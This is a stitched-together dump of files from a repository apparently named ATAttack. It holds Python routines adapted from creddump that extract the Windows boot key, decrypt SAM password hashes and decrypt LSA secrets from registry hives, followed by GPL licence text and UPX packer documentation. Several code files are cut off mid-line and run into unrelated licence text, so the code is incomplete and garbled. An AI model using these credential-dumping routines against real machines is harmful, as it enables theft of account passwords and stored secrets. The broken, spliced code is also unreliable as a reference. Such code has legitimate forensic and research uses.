45 | ]
46 |
47 | # Permutation matrix for boot key
48 | p = [ 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
49 | 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 ]
50 |
51 | # Constants for SAM decrypt algorithm
52 | aqwerty = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
53 | anum = "0123456789012345678901234567890123456789\0"
54 | antpassword = "NTPASSWORD\0"
55 | almpassword = "LMPASSWORD\0"
56 |
57 | empty_lm = "aad3b435b51404eeaad3b435b51404ee".decode('hex')
58 | empty_nt = "31d6cfe0d16ae931b73c59d7e0c089c0".decode('hex')
59 |
60 | def str_to_key(s):
61 | key = []
62 | key.append( ord(s[0])>>1 )
63 | key.append( ((ord(s[0])&0x01)<<6) | (ord(s[1])>>2) )
64 | key.append( ((ord(s[1])&0x03)<<5) | (ord(s[2])>>3) )
65 | key.append( ((ord(s[2])&0x07)<<4) | (ord(s[3])>>4) )
66 | key.append( ((ord(s[3])&0x0F)<<3) | (ord(s[4])>>5) )
67 | key.append( ((ord(s[4])&0x1F)<<2) | (ord(s[5])>>6) )
68 | key.append( ((ord(s[5])&0x3F)<<1) | (ord(s[6])>>7) )
69 | key.append( ord(s[6])&0x7F )
70 | for i in range(8):
71 | key[i] = (key[i]<<1)
72 | key[i] = odd_parity[key[i]]
73 | return "".join(chr(k) for k in key)
74 |
75 | def sid_to_key(sid):
76 | s1 = ""
77 | s1 += chr(sid & 0xFF)
78 | s1 += chr((sid>>8) & 0xFF)
79 | s1 += chr((sid>>16) & 0xFF)
80 | s1 += chr((sid>>24) & 0xFF)
81 | s1 += s1[0];
82 | s1 += s1[1];
83 | s1 += s1[2];
84 | s2 = s1[3] + s1[0] + s1[1] + s1[2]
85 | s2 += s2[0] + s2[1] + s2[2]
86 |
87 | return str_to_key(s1),str_to_key(s2)
88 |
89 | def find_control_set(sysaddr):
90 | root = get_root(sysaddr)
91 | if not root:
92 | return 1
93 |
94 | csselect = open_key(root, ["Select"])
95 | if not csselect:
96 | return 1
97 |
98 | for v in values(csselect):
99 | if v.Name == "Current": return v.Data.value
100 |
101 | def get_bootkey(sysaddr):
102 | cs = find_control_set(sysaddr)
103 | lsa_base = ["ControlSet%03d" % cs, "Control", "Lsa"]
104 | lsa_keys = ["JD","Skew1","GBG","Data"]
105 |
106 | root = get_root(sysaddr)
107 | if not root: return None
108 |
109 | lsa = open_key(root, lsa_base)
110 | if not lsa: return None
111 |
112 | bootkey = ""
113 |
114 | for lk in lsa_keys:
115 | key = open_key(lsa, [lk])
116 | class_data = sysaddr.read(key.Class.value, key.ClassLength.value)
117 | bootkey += class_data.decode('utf-16-le').decode('hex')
118 |
119 | bootkey_scrambled = ""
120 | for i in range(len(bootkey)):
121 | bootkey_scrambled += bootkey[p[i]]
122 |
123 | return bootkey_scrambled
124 |
125 | def get_hbootkey(samaddr, bootkey):
126 | sam_account_path = ["SAM", "Domains", "Account"]
127 |
128 | root = get_root(samaddr)
129 | if not root: return None
130 |
131 | sam_account_key = open_key(root, sam_account_path)
132 | if not sam_account_key: return None
133 |
134 | F = None
135 | for v in values(sam_account_key):
136 | if v.Name == 'F':
137 | F = samaddr.read(v.Data.value, v.DataLength.value)
138 | if not F: return None
139 |
140 | md5 = MD5.new()
141 | md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
142 | rc4_key = md5.digest()
143 |
144 | rc4 = ARC4.new(rc4_key)
145 | hbootkey = rc4.encrypt(F[0x80:0xA0])
146 |
147 | return hbootkey
148 |
149 | def get_user_keys(samaddr):
150 | user_key_path = ["SAM", "Domains", "Account", "Users"]
151 |
152 | root = get_root(samaddr)
153 | if not root: return []
154 |
155 | user_key = open_key(root, user_key_path)
156 | if not user_key: return []
157 |
158 | return [k for k in subkeys(user_key) if k.Name != "Names"]
159 |
160 | def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr):
161 | (des_k1,des_k2) = sid_to_key(rid)
162 | d1 = DES.new(des_k1, DES.MODE_ECB)
163 | d2 = DES.new(des_k2, DES.MODE_ECB)
164 |
165 | md5 = MD5.new()
166 | md5.update(hbootkey[:0x10] + pack(".
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from framework.win32.rawreg import *
23 | from framework.addrspace import HiveFileAddressSpace
24 | from framework.win32.hashdump import get_bootkey,str_to_key
25 | from Crypto.Hash import MD5
26 | from Crypto.Cipher import ARC4,DES
27 |
28 | def get_lsa_key(secaddr, bootkey):
29 | root = get_root(secaddr)
30 | if not root:
31 | return None
32 |
33 | enc_reg_key = open_key(root, ["Policy", "PolSecretEncryptionKey"])
34 | if not enc_reg_key:
35 | return None
36 |
37 | enc_reg_value = enc_reg_key.ValueList.List[0]
38 | if not enc_reg_value:
39 | return None
40 |
41 | obf_lsa_key = secaddr.read(enc_reg_value.Data.value,
42 | enc_reg_value.DataLength.value)
43 | if not obf_lsa_key:
44 | return None
45 |
46 | md5 = MD5.new()
47 | md5.update(bootkey)
48 | for i in range(1000):
49 | md5.update(obf_lsa_key[60:76])
50 | rc4key = md5.digest()
51 |
52 | rc4 = ARC4.new(rc4key)
53 | lsa_key = rc4.decrypt(obf_lsa_key[12:60])
54 |
55 | return lsa_key[0x10:0x20]
56 |
57 | def decrypt_secret(secret, key):
58 | """Python implementation of SystemFunction005.
59 |
60 | Decrypts a block of data with DES using given key.
61 | Note that key can be longer than 7 bytes."""
62 | decrypted_data = ''
63 | j = 0 # key index
64 | for i in range(0,len(secret),8):
65 | enc_block = secret[i:i+8]
66 | block_key = key[j:j+7]
67 | des_key = str_to_key(block_key)
68 |
69 | des = DES.new(des_key, DES.MODE_ECB)
70 | decrypted_data += des.decrypt(enc_block)
71 |
72 | j += 7
73 | if len(key[j:j+7]) < 7:
74 | j = len(key[j:j+7])
75 |
76 | (dec_data_len,) = unpack(".
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from ATAttack.framework.newobj import Obj,Pointer
23 | from struct import unpack
24 |
25 | ROOT_INDEX = 0x20
26 | LH_SIG = unpack("
294 | Copyright (C)
295 |
296 | This program is free software; you can redistribute it and/or modify
297 | it under the terms of the GNU General Public License as published by
298 | the Free Software Foundation; either version 2 of the License, or
299 | (at your option) any later version.
300 |
301 | This program is distributed in the hope that it will be useful,
302 | but WITHOUT ANY WARRANTY; without even the implied warranty of
303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
304 | GNU General Public License for more details.
305 |
306 | You should have received a copy of the GNU General Public License along
307 | with this program; if not, write to the Free Software Foundation, Inc.,
308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 |
310 | Also add information on how to contact you by electronic and paper mail.
311 |
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 |
315 | Gnomovision version 69, Copyright (C) year name of author
316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 | This is free software, and you are welcome to redistribute it
318 | under certain conditions; type `show c' for details.
319 |
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License. Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 |
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary. Here is a sample; alter the names:
328 |
329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 | `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 |
332 | , 1 April 1989
333 | Ty Coon, President of Vice
334 |
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs. If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library. If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 |
--------------------------------------------------------------------------------
/upx-3.95-win64/LICENSE:
--------------------------------------------------------------------------------
1 | -----BEGIN PGP SIGNED MESSAGE-----
2 |
3 |
4 | ooooo ooo ooooooooo. ooooooo ooooo
5 | `888' `8' `888 `Y88. `8888 d8'
6 | 888 8 888 .d88' Y888..8P
7 | 888 8 888ooo88P' `8888'
8 | 888 8 888 .8PY888.
9 | `88. .8' 888 d8' `888b
10 | `YbodP' o888o o888o o88888o
11 |
12 |
13 | The Ultimate Packer for eXecutables
14 | Copyright (c) 1996-2000 Markus Oberhumer & Laszlo Molnar
15 | http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
16 | http://www.nexus.hu/upx
17 | http://upx.tsx.org
18 |
19 |
20 | PLEASE CAREFULLY READ THIS LICENSE AGREEMENT, ESPECIALLY IF YOU PLAN
21 | TO MODIFY THE UPX SOURCE CODE OR USE A MODIFIED UPX VERSION.
22 |
23 |
24 | ABSTRACT
25 | ========
26 |
27 | UPX and UCL are copyrighted software distributed under the terms
28 | of the GNU General Public License (hereinafter the "GPL").
29 |
30 | The stub which is imbedded in each UPX compressed program is part
31 | of UPX and UCL, and contains code that is under our copyright. The
32 | terms of the GNU General Public License still apply as compressing
33 | a program is a special form of linking with our stub.
34 |
35 | As a special exception we grant the free usage of UPX for all
36 | executables, including commercial programs.
37 | See below for details and restrictions.
38 |
39 |
40 | COPYRIGHT
41 | =========
42 |
43 | UPX and UCL are copyrighted software. All rights remain with the authors.
44 |
45 | UPX is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
46 | UPX is Copyright (C) 1996-2000 Laszlo Molnar
47 |
48 | UCL is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
49 |
50 |
51 | GNU GENERAL PUBLIC LICENSE
52 | ==========================
53 |
54 | UPX and the UCL library are free software; you can redistribute them
55 | and/or modify them under the terms of the GNU General Public License as
56 | published by the Free Software Foundation; either version 2 of
57 | the License, or (at your option) any later version.
58 |
59 | UPX and UCL are distributed in the hope that they will be useful,
60 | but WITHOUT ANY WARRANTY; without even the implied warranty of
61 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
62 | GNU General Public License for more details.
63 |
64 | You should have received a copy of the GNU General Public License
65 | along with this program; see the file COPYING.
66 |
67 |
68 | SPECIAL EXCEPTION FOR COMPRESSED EXECUTABLES
69 | ============================================
70 |
71 | The stub which is imbedded in each UPX compressed program is part
72 | of UPX and UCL, and contains code that is under our copyright. The
73 | terms of the GNU General Public License still apply as compressing
74 | a program is a special form of linking with our stub.
75 |
76 | Hereby Markus F.X.J. Oberhumer and Laszlo Molnar grant you special
77 | permission to freely use and distribute all UPX compressed programs
78 | (including commercial ones), subject to the following restrictions:
79 |
80 | 1. You must compress your program with a completely unmodified UPX
81 | version; either with our precompiled version, or (at your option)
82 | with a self compiled version of the unmodified UPX sources as
83 | distributed by us.
84 | 2. This also implies that the UPX stub must be completely unmodfied, i.e.
85 | the stub imbedded in your compressed program must be byte-identical
86 | to the stub that is produced by the official unmodified UPX version.
87 | 3. The decompressor and any other code from the stub must exclusively get
88 | used by the unmodified UPX stub for decompressing your program at
89 | program startup. No portion of the stub may get read, copied,
90 | called or otherwise get used or accessed by your program.
91 |
92 |
93 | ANNOTATIONS
94 | ===========
95 |
96 | - You can use a modified UPX version or modified UPX stub only for
97 | programs that are compatible with the GNU General Public License.
98 |
99 | - We grant you special permission to freely use and distribute all UPX
100 | compressed programs. But any modification of the UPX stub (such as,
101 | but not limited to, removing our copyright string or making your
102 | program non-decompressible) will immediately revoke your right to
103 | use and distribute a UPX compressed program.
104 |
105 | - UPX is not a software protection tool; by requiring that you use
106 | the unmodified UPX version for your proprietary programs we
107 | make sure that any user can decompress your program. This protects
108 | both you and your users as nobody can hide malicious code -
109 | any program that cannot be decompressed is highly suspicious
110 | by definition.
111 |
112 | - You can integrate all or part of UPX and UCL into projects that
113 | are compatible with the GNU GPL, but obviously you cannot grant
114 | any special exceptions beyond the GPL for our code in your project.
115 |
116 | - We want to actively support manufacturers of virus scanners and
117 | similar security software. Please contact us if you would like to
118 | incorporate parts of UPX or UCL into such a product.
119 |
120 |
121 |
122 | Markus F.X.J. Oberhumer Laszlo Molnar
123 | markus.oberhumer@jk.uni-linz.ac.at ml1050@cdata.tvnet.hu
124 |
125 | Linz, Austria, 25 Feb 2000
126 |
127 |
128 |
129 | -----BEGIN PGP SIGNATURE-----
130 | Version: 2.6.3ia
131 | Charset: noconv
132 |
133 | iQCVAwUBOLaLS210fyLu8beJAQFYVAP/ShzENWKLTvedLCjZbDcwaBEHfUVcrGMI
134 | wE7frMkbWT2zmkdv9hW90WmjMhOBu7yhUplvN8BKOtLiolEnZmLCYu8AGCwr5wBf
135 | dfLoClxnzfTtgQv5axF1awp4RwCUH3hf4cDrOVqmAsWXKPHtm4hx96jF6L4oHhjx
136 | OO03+ojZdO8=
137 | =CS52
138 | -----END PGP SIGNATURE-----
139 |
--------------------------------------------------------------------------------
/upx-3.95-win64/NEWS:
--------------------------------------------------------------------------------
1 | ==================================================================
2 | User visible changes for UPX
3 | ==================================================================
4 |
5 | Changes in 3.95 (26 Aug 2018):
6 | * Flag --android-shlib to work around bad design in Android
7 | * Flag --force-pie when ET_DYN main program is not marked as DF_1_PIE
8 | * Better compatibility with varying layout of address space on Linux
9 | * Support for 4 PT_LOAD layout in ELF generated by binutils-2.31
10 | * bug fixes, particularly better diagnosis of malformed input
11 | * bug fixes - see https://github.com/upx/upx/milestone/4
12 |
13 | Changes in 3.94 (12 May 2017):
14 | * Add support for arm64-linux (aka "aarch64").
15 | * Add support for --lzma compression on 64-bit PowerPC (Thierry Fauck).
16 | * For Mach, "upx -d" will unpack a prefix of the file (and warn).
17 | * Various improvements to the ELF formats.
18 | * bug fixes - see https://github.com/upx/upx/milestone/3
19 |
20 | Changes in 3.93 (29 Jan 2017):
21 | * Fixed some win32/pe and win64/pe regressions introduced in 3.92
22 | * bug fixes - see https://github.com/upx/upx/milestone/2
23 |
24 | Changes in 3.92 (11 Dec 2016):
25 | * INFO: UPX has moved to GitHub - the new home page is https://upx.github.io
26 | * IMPORTANT: all PE formats: internal changes: reunited the diverged source
27 | files - please report all regressions into the bug tracker and try UPX 3.91
28 | in case of problems.
29 | * Support Apple MacOS 10.12 "Sierra", including more-robust de-compression.
30 | * Explicitly diagnose Go-language bad PT_LOAD; recommend hemfix.c.
31 | https://sourceforge.net/p/upx/bugs/195/ https://github.com/pwaller/goupx
32 | * Fix CERT-FI Case 829767 UPX command line tools segfaults.
33 | Received by UPX Team on 2015-May-08; originally reported
34 | by Codenomicon to NCSC-FI on 2015-01-08.
35 | The vulnerabilities were discovered by Joonas Kuorilehto and
36 | Antti Häyrynen from Codenomicon.
37 | * bug fixes - see https://github.com/upx/upx/milestone/1
38 |
39 | Changes in 3.91 (30 Sep 2013):
40 | * Added experimental support for Windows 64-bit PE files, based on
41 | work by Stefan Widmann. Please use for testing only!
42 | * bug fixes
43 |
44 | ==================================================================
45 |
46 | Changes in 3.09 (18 Feb 2013):
47 | * New option --preserve-build-id for GNU ELF.
48 | * Allow for code signing and LC_UUID on Mac OS X executables.
49 | * Allow non-contiguous LC_SEGMENTs and 0==.vmsize for Mach-O.
50 | * Allow zero-filled final page in PackUnix::canUnpack().
51 | * bug fixes
52 |
53 | Changes in 3.08 (12 Dec 2011):
54 | * Fix allocation in runtime stub for darwin.macho-entry (i386 and amd64).
55 | * Compress shared library on ELF i386 only [ld.so threatens even this case].
56 | * Attempt to support ELF on QNX 6.3.0 for armel (experimental).
57 | * Better diagnostic when ELF -fPIC is needed.
58 | * PT_NOTE improvements for *BSD.
59 | * Preserve more ELF .e_flags on ARM.
60 | * Minor code improvements for ELF stubs.
61 | * Defend against another flavor of corrupt PE header.
62 | * bug fixes
63 |
64 | Changes in 3.07 (08 Sep 2010):
65 | * win32/pe: fixed relocation handling for files with *no* TLS callbacks
66 | [severe bug introduced in 3.06]
67 |
68 | Changes in 3.06 (04 Sep 2010):
69 | * win32/pe: TLS callback support contributed by Stefan Widmann. Thanks!
70 | * bug fixes
71 |
72 | Changes in 3.05 (27 Apr 2010):
73 | * i386-linux and amd64-linux support shared libraries (DT_INIT must
74 | exist, all info needed by runtime loader must be first in .text, etc.)
75 | * Linux /proc/self/exe now is preserved by default, by leaving behind
76 | one page. New compress-time option --unmap-all-pages is available.
77 | * Withdraw support for shared libraries on Darwin (Apple Mac OS X)
78 | because upx does not understand enough about .dylib.
79 | * bug fixes
80 |
81 | Changes in 3.04 (27 Sep 2009):
82 | * new format Mach/AMD64 supports 64-bit programs on Apple Macintosh.
83 | * new formats Dylib/i386 and Dylib/ppc32 support shared libraries
84 | [such as browser plugins] on Darwin (Apple Macintosh). An existing
85 | -init function (LC_ROUTINES command) is required.
86 | * new format vmlinuz/armel for Debian NSLU2 (etc.) linux kernel
87 | * bvmlinuz boot protocol 2.08 for 386 Linux kernel
88 | * Extended ABI version 4 for armel-eabi ARM Linux ELF
89 | * bug fixes
90 |
91 | Changes in 3.03 (27 Apr 2008):
92 | * implement cache flushing for PowerPC (esp. model 440)
93 | * fix cache flushing on MIPS (>3 MiB compressed, or with holes)
94 | * fix MIPS big-endian
95 | * bug fixes
96 |
97 | Changes in 3.02 (16 Dec 2007):
98 | * fix unmapping on arm-linux.elf
99 | * fix error checking in mmap for i386-linux.elf [triggered by -fPIE]
100 | * bug fixes
101 |
102 | Changes in 3.01 (31 Jul 2007):
103 | * new options --no-mode, --no-owner and --no-time to disable preservation
104 | of mode (file permissions), file ownership and timestamps.
105 | * dos/exe: fixed an incorrect error message caused by a bug in
106 | relocation handling
107 | * new format linux/mipsel supports ELF on [32-bit] R3000
108 | * fix argv[0] on PowerPC with --lzma
109 | * bug fixes
110 |
111 | Changes in 3.00 (27 Apr 2007):
112 | * watcom/le & tmt/adam: fixed a problem when using certain filters
113 |
114 | Changes in 2.93 beta (08 Mar 2007):
115 | * new formats Mach/i386 and Mach/fat support Mac OS X i686 and
116 | Universal binaries [i686 and PowerPC only]
117 | * dos/exe: LZMA is now also supported for 16-bit dos/exe. Please note that
118 | you have to explicitly use '--lzma' even for '--ultra-brute' here
119 | because runtime decompression is about 30 times slower than NRV -
120 | which is really noticeable on old machines.
121 | * dos/exe: fixed a rarely occurring bug in relocation handling
122 | * win32/pe & arm/pe: better icon compression handling
123 |
124 | Changes in 2.92 beta (23 Jan 2007):
125 | * new option '--ultra-brute' which tries even more variants
126 | * slightly improved compression ratio for some files when
127 | using '--brute' or '--ultra-brute'
128 | * bug fixes
129 |
130 | Changes in 2.91 beta (29 Nov 2006):
131 | * assorted bug fixes
132 | * arm/pe: fix "missing" icon & version info resource problem for wince 5
133 | * win32/pe & arm/pe: added option --compress-icons=3 to compress all icons
134 |
135 | Changes in 2.90 beta (08 Oct 2006):
136 | * LZMA algorithm support for most of the 32-bit and 64-bit file formats;
137 | use new option '--lzma' to enable
138 | * new format: BSD/elf386 supporting FreeBSD, NetBSD and OpenBSD
139 | via auto-detection of PT_NOTE or EI_OSABI
140 | * arm/pe: all the NRV compression methods are now supported
141 | (only NRV2D is missing in thumb mode)
142 | * linux/elf386, linux/ElfAMD: remember /proc/self/exe in environment
143 | * major source code changes: the runtime decompression stubs are now
144 | built from internal ELF objects
145 |
146 | ==================================================================
147 |
148 | Changes in 2.03 (07 Nov 2006):
149 | * bvmlinuz/386: fix for kernels not at 0x100000; also allow x86_64
150 | * linux/elf386: work around Linux kernel bug (0-length .bss needs PF_W)
151 |
152 | Changes in 2.02 (13 Aug 2006):
153 | * linux/386: work around Linux kernel bug (".bss" requires PF_W)
154 | * linux/ppc32, mach/ppc32: compressed programs now work on a 405 CPU
155 | * vmlinuz/386: fixed zlib uncompression problem on DOS
156 |
157 | Changes in 2.01 (06 Jun 2006):
158 | * arm/pe: better DLL support
159 | * dos/exe: device driver support added
160 | * linux/386: Fix --force-execve for PaX, grSecurity, and strict SELinux.
161 | /tmp must support execve(); therefore /tmp cannot be mounted 'noexec'.
162 | * win32/pe & arm/pe: added new option '--keep-resource=' for
163 | excluding selected resources from compression
164 |
165 | Changes in 2.00 (27 Apr 2006):
166 | * linux/386: the stub now prints an error message if some strict
167 | SELinux mode does prevent runtime decompression and execution
168 | (for a fully SELinux-compatible but otherwise inferior compression
169 | format you can use the '--force-execve' option)
170 | * linux/386: worked around a problem where certain Linux kernels
171 | clobber the %ebx register during a syscall
172 | * win32/pe: disable filters for files with broken PE headers
173 |
174 | Changes in 1.96 beta (13 Apr 2006):
175 | * arm/pe: added filter support
176 | * win32/pe: removed an unnecessary check so that Delphi 2006 and
177 | Digital Mars C++ programs finally are supported
178 |
179 | Changes in 1.95 beta (09 Apr 2006):
180 | * arm/pe: added DLL support
181 | * arm/pe: added thumb mode stub support
182 | * arm/pe: added unpacking support
183 | * win32/pe: really worked around R6002 runtime errors
184 |
185 | Changes in 1.94 beta (11 Mar 2006):
186 | * new format: added support for arm/pe (ARM executables running on WinCE)
187 | * new format: added support for linux elf/amd64
188 | * new format: added support for linux elf/ppc32
189 | * new format: added support for mach/ppc32 (Apple Mac OS X)
190 | * win32/pe: hopefully working "load config" support
191 | * win32/pe: R6002 runtime errors worked around
192 | * win32/pe: the stub now clears the dirty stack
193 |
194 | Changes in 1.93 beta (07 Feb 2005):
195 | * vmlinuz/386: fixes to support more kernels
196 |
197 | Changes in 1.92 beta (20 Jul 2004):
198 | * win32/pe: added option '--strip-loadconf' to strip the SEH load
199 | config section [NOTE: this option is obsolete since UPX 1.94]
200 | * win32/pe: try to detect .NET (win32/net) files [not yet supported by UPX]
201 | * vmlinux/386: new format that directly supports building Linux kernels
202 | * source code: now compiles cleanly under Win64
203 |
204 | Changes in 1.91 beta (30 Jun 2004):
205 | * djgpp2/coff: added support for recent binutils versions
206 | * linux/elf386, linux/sh386: lots of improvements
207 | * vmlinuz/386: added support for recent kernels
208 | * watcom/le: don't crash on files without relocations
209 | * win32/pe: stricter checks of some PE values
210 | * option '--brute' now implies '--crp-ms=999999'.
211 | * source code: much improved portability using ACC, the
212 | Automatic Compiler Configuration
213 | * source code: compile fixes for strict ISO C++ compilers
214 | * source code: compile fixes for Win64
215 | * re-synced with upx 1.25 branch
216 |
217 | Changes in 1.90 beta (11 Nov 2002):
218 | * implemented several new options for finer compression control:
219 | '--all-methods', '--all-filters' and '--brute'
220 | * ps1/exe: new format - UPX now supports PlayStation One programs
221 | * linux/386: added the option '--force-execve'
222 | * vmlinuz/386: better kernel detection and sanity checks
223 | * re-synced with upx 1.24 branch
224 | * documentation updates
225 |
226 | Changes in 1.11 beta (20 Dec 2000):
227 | * vmlinuz/386: new format - UPX now supports bootable linux kernels
228 | * linux/elf386: added the new ELF direct-to-memory executable format - no
229 | more temp files are needed for decompression!
230 | * linux/sh386: added the new shell direct-to-memory executable format - no
231 | more temp files are needed for decompression!
232 | * reduced overall memory requirements during packing
233 | * quite a number of internal source code rearrangements
234 |
235 | ==================================================================
236 |
237 | Changes in 1.25 (29 Jun 2004)
238 | * INFO: http://upx.sourceforge.net is the permanent UPX home page
239 | * watcom/le: don't crash on files without relocations
240 | * win32/pe: stricter checks of some PE values
241 | * source code: much improved portability using ACC, the
242 | Automatic Compiler Configuration
243 | * source code: compile fixes for strict ISO C++ compilers
244 | * source code: compile fixes for Win64
245 |
246 | Changes in 1.24 (07 Nov 2002)
247 | * djgpp2/coff: stricter check of the COFF header to work around a
248 | problem with certain binutils versions
249 |
250 | Changes in 1.23 (05 Sep 2002)
251 | * atari/tos: fixed an unpacking problem where a buffer was too
252 | small (introduced in 1.22)
253 | * linux/386: don't give up too early if a single block turns out
254 | to be incompressible
255 | * documentation: added some quick tips how to achieve the best
256 | compression ratio for the final release of your application
257 | * fixed a rare situation where the exit code was not set correctly
258 |
259 | Changes in 1.22 (27 Jun 2002)
260 | * atari/tos: the stub now flushes the CPU cache to avoid
261 | problems on 68030+ machines
262 | * source code: additional compiler support for Borland C++,
263 | Digital Mars C++ and Watcom C++
264 |
265 | Changes in 1.21 (01 Jun 2002)
266 | * New option '--crp-ms=' for slightly better compression at the cost
267 | of higher memory requirements during compression.
268 | Try 'upx --best --crp-ms=100000'. See the docs for more info.
269 | * source code: portability fixes
270 | * source code: compile fixes for g++ 3.0 and g++ 3.1
271 |
272 | Changes in 1.20 (23 May 2001)
273 | * slightly faster compression
274 | * work around a gcc problem in the latest djgpp2 distribution
275 | * watcom/le: fixed detection of already compressed files
276 | * win32/pe: do not compress RT_MANIFEST resource types
277 | * win32/pe: improved the error message for empty resource sections
278 | * [NOTE: the jump from 1.08 to 1.20 is to avoid confusion with
279 | our unstable development releases 1.1x and 1.9x]
280 |
281 | Changes in 1.08 (30 Apr 2001)
282 | * new native port to atari/tos
283 | * win32/pe: shortened the identstring
284 | * source code: portability fixes - UPX now builds cleanly under m68k CPUs
285 |
286 | Changes in 1.07 (20 Feb 2001)
287 | * win32/pe: corrected the TLS callback check
288 | * win32/pe: really fixed that rare bug in relocation handling
289 | * win32/pe: experimental support for SizeOfHeaders > 0x1000
290 | * win32/pe: check for superfluous data between sections
291 | * win32/pe: compressing screensavers (.scr) should finally work
292 |
293 | Changes in 1.06 (27 Jan 2001)
294 | * win32/pe: the check for TLS callbacks introduced in 1.05
295 | was too strict - disabled for now
296 | * dos/com: decreased the decompressor stack size a little bit
297 |
298 | Changes in 1.05 (24 Jan 2001)
299 | * win32/pe: refuse to compress programs with TLS callbacks
300 | * win32/pe: stub changes to avoid slowdowns with some virus monitors
301 | * win32/pe: reverted the relocation handling changes in 1.04
302 | * linux/386: dont try to compress Linux kernel images (have a look
303 | at the unstable UPX 1.1x beta versions for that)
304 |
305 | Changes in 1.04 (19 Dec 2000)
306 | * dos/exe: fixed an internal error when using '--no-reloc'
307 | * win32/pe: fixed a rare bug in the relocation handling code
308 | * some tunings for the default compression level
309 |
310 | Changes in 1.03 (30 Nov 2000)
311 | * linked with a new version of the NRV compression library:
312 | - improved compression ratio a little bit
313 | - overall significantly faster compression
314 | - much faster when using high compression levels like '-9' or '--best'
315 | - much faster with large files
316 | * atari/tos: added support for FreeMiNT
317 | * the 32-bit DOS version now uses the new CWSDSTUB extender
318 |
319 | Changes in 1.02 (13 Sep 2000)
320 | * watcom/le: fixed a problem with the Causeway extender
321 | * win32/pe: don't automatically strip relocs if they seem needed
322 | * support multiple backup generations when using '-k'
323 | * updated the console screen driver
324 |
325 | Changes in 1.01 (09 Apr 2000)
326 | * win32/pe: fixed an uncompression problem in DLLs with empty
327 | fixup sections
328 | * win32/pe: fixed another rare uncompression problem - a field in the
329 | PE header was set incorrectly
330 |
331 | Changes in 1.00 (26 Mar 2000)
332 | * documentation updates
333 | * watcom/le: do not duplicate the non-resident name table
334 | * win32/pe: fixed an import handling problem: sometimes too much data
335 | could be deleted from a file -> the uncompressed file would not work
336 | anymore
337 |
338 | Changes in 0.99.3 (07 Mar 2000)
339 | * win32/pe: fixed a rare problem in the stub string handling part
340 |
341 | Changes in 0.99.2 (02 Mar 2000)
342 | * dos/exe: fixed a typo causing an internal error (introduced in 0.99.1)
343 |
344 | Changes in 0.99.1 (29 Feb 2000)
345 | * win32/pe: fixed some object alignments which were causing
346 | problems when loading compressed DLLs under Windows NT/2000
347 |
348 | Changes in 0.99 (25 Feb 2000)
349 | * FULL SOURCE CODE RELEASED UNDER THE TERMS OF THE GNU GPL
350 | * win32/pe: changed default to '--strip-relocs=1'
351 | * dos/com and dos/sys: fixed a bad decompressor problem
352 | * linux/386: the counter for the progress indicator was off by one
353 |
354 | Changes in 0.94 (06 Dec 1999)
355 | * win32/pe: the stub now calls ExitProcess in case of import errors
356 | * under DOS and Windows, the environment variable UPX now accepts
357 | a '#' as replacement for '=' because of a COMMAND.COM limitation
358 |
359 | Changes in 0.93 (22 Nov 1999)
360 | * win32/pe: fixed --strip-relocs problem with uncompression
361 | * win32/pe: fixed a bug which could produce a broken decompressor stub
362 | * linux/386: yet another FreeBSD compatibility fix
363 |
364 | Changes in 0.92 (14 Nov 1999)
365 | * win32/pe: really fixed that one line (see below)
366 |
367 | Changes in 0.91 (13 Nov 1999)
368 | * win32/pe: an important one-line fix for the newly introduced problems
369 | * dos/com and dos/sys: fixed an internal error
370 | * dos/exe: correctly restore cs when uncompressing
371 |
372 | Changes in 0.90 (10 Nov 1999)
373 | * all formats: '--overlay=copy' now is the default overlay mode
374 | * improved compression ratio for most files
375 | * win32/pe: uncompression is finally supported
376 | * win32/pe: never compress REGISTRY resources
377 | * win32/pe: headersize was not set in PE header
378 | * win32/pe: resource handling is rewritten
379 | * win32/pe: the last :-) TLS problem is fixed
380 | * win32/pe: somewhat less memory is required during compression
381 | * linux/386: fixed compression of scripts which was broken since 0.71
382 | * linux/386: more FreeBSD compatibility issues
383 | * changed option: '-i' now prints some more details during compression
384 | (not finished yet)
385 |
386 | Changes in 0.84 (04 Oct 1999)
387 | * dos/exe: fixed a rare problem where the decompressor could crash
388 | * some other minor fixes
389 |
390 | Changes in 0.83 (17 Sep 1999)
391 | * dos/exe: fixed minimal memory requirement problem for some files
392 | * win32/pe: fixed a bug which caused a crash in some compressed files
393 | * linux/386: various improvements in the stub; also, for the sake
394 | of FreeBSD users, the stub is now branded as Linux/ELF
395 |
396 | Changes in 0.82 (16 Aug 1999)
397 | * dos/exe: fixed a decompressor bug which could cause crash on some files
398 | * linux/386: section headers are now stripped from the stub so that
399 | 'strip' won't ruin a compressed file any longer
400 | * wc/le: support for stack not in the last object disabled again
401 | * win32/pe: removed some unneeded data
402 |
403 | Changes in 0.81 (04 Aug 1999)
404 | * win32/pe: fixed an important bug in import handling
